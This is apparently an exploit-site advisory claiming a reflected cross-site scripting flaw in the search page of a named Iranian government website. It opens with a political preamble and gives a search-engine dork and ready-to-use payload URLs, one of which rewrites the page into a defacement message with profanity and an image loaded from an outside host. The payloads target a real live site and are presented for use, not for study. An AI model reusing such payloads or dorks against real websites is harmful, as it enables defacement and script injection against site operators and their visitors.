-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
confidential "Top Secret"
This message is written to describe the security issue and is confidential and should not be included in the report
This site belongs to the organization of the leader of the Islamic Republic of Iran "Khamenei".
who ordered the killing of Mehsa Amini, a 22-year-old Iranian woman, and she was killed by the moral police, and the people protested in the streets, and now the Iranian police are trying to identify these people.
This site has a security issue with an XSS vulnerability.
We have reported many times to this site that it has a security problem and it has ignored our report.
We want to definitely register and report this security issue
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
################################################## ################################################## #####################
# #
# Exploit Title : Khameneie.ir has XSS vulnerabilities #
# #
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Portal Link : khamenei.ir (https://farsi.khamenei.ir) #
# #
# Tested ON : All language version Host #
# #
# Security Risk : ~[Critical]~ #
# #
# Description : Description: All websites with this version used can be targeted #
# #
# DorK : "intext:"site:farsi.khamenei.ir/search-result?q=" #
# # site:farsi.khamenei.ir/search-result?q=YOUR KEYWORD&
# #
# #
################################################## ################################################## #####################
Details :
the vulnerable file is "book-archive"
XSS Expl0iTs :
https://farsi.khamenei.ir/search-result?q=%3CXSS%20SCRIPT%3E&nt=99,101,2,4,9,1,16,
Dem0 :
https://farsi.khamenei.ir/search-result?q=%3C/script%3E%3Cscript%3Edocument.documentElement.innerHTML=%22%3Ccenter%3E%3Ch1%3EHacked%20by%20E1.Coders%3C/h1%3E%3Cimg%20src=%27https://cybercrimemag.wpenginepowered.com/wp-content/uploads/2018/11/Keyboard-Typing-700x467.jpg%27%3E%3Ccenter%3E%3Ch2%3ERUSSIAN%20-%20BLACK%20-%HAT%20%3C/h2%3E%3C/center%3E%3Ch2%3ESECURITY_is_Low%20~Fuck~%3C/h2%3E%3C/center%3E%22%3C/script%3E&nt=99,101,2,4,9,1,16